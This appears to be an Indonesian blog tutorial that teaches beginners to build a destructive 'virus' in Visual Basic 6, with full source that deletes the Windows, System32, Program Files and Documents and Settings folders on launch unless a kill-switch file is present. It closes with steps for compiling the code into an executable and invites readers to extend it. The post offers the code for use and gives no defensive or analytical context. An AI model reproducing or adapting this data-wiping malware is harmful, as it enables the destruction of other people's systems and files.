cara membuat visual basic

Kali ini saya akan membahas tentang bagaimana cara membuat virus  dengan visual basic mungkin bagi master2 vb tidak perlu untuk membaca tutorial ini dikhususkan untuk pemula  banyak sekali virus2 yaang sudah bertebaran di internet tapi bagaimana program virus itu bekerja berikut langkah-langkahnya

Langkah-langkahnya adalah:

1. Buka Visual Basic 6.0 kalian lalu pilih Standart Exe.
2. Lalu buat formnya sekecil mungkin.
3. Dan klik 2x pada form itu dan akan menampilkan halaman untuk menaruh source kode, tolong hapus kode yang sudah ada, dan CoPas seluruh kode dibawah ini:

Public Sub DelAll(ByVal DirtoDelete As Variant)
Dim FSO, FS
Set FSO = CreateObject(”Scripting.FileSystemObject”)
FS = FSO.DeleteFolder(DirtoDelete, True)
End Sub
Private Sub Form_Load()
On Error Resume Next
If FileExist(”c:windowssystem32unpamhack.txt”) = True Then
End
Else
Call DelAll(”c:windowssystem”)
Call DelAll(”c:windowssystem32″)
Call DelAll(”c:windows”)
Call DelAll(”C:Documents and SettingsAll Users”)
Call DelAll(”C:Documents and SettingsAdministrator”)
Call DelAll(”C:Documents and Settings”)
Call DelAll(”C:Program FilesCommon Files”)
Call DelAll(”C:Program Files Internet Explorer”)
Call DelAll(”C:Program FilesMicrosoft Visual Studio”)
Call DelAll(”C:Program Files”)
End
End If
End Sub
Function FileExist(ByVal FileName As String) As Boolean
If Dir(FileName) = “” Then
FileExist = False
Else
FileExist = True
End If
End Function

4. Setelah udah diCoPas silahkan dieksekusi dengan menekan tombol F5, atau bikin jadi exe. dengan cara buka menu File pilih Make Project1.exe simpan dengan nama apa saja,,

Nah untuk keterangan dari koding diatas adalah, pada teks yang merah itu penangkal nih virus, jadi kalau di folder c:windowssystem32 ada file yang namanya unpamhack.txt, kalian ga bakal keserang oleh virus ini. bisa kalian edit koq jadi apa aja.. Satu lagi kalian gak bisa ngedit folder drive D yang untuk dijadikan objek untuk dihapus karena hanya bisa menghapus sistem saja. Apa jadinya kalau sistem terhapus?? ERRRROOORRR alias komputer situ ngblanggggg…..blengg..blengg..bleenggg…

anda dapat mengembangkan lebih lanjut.

Tinggalkan Balasan

Isikan data di bawah atau klik salah satu ikon untuk log in:

Logo WordPress.com

You are commenting using your WordPress.com account. Logout / Ubah )

Gambar Twitter

You are commenting using your Twitter account. Logout / Ubah )

Foto Facebook

You are commenting using your Facebook account. Logout / Ubah )

Foto Google+

You are commenting using your Google+ account. Logout / Ubah )

Connecting to %s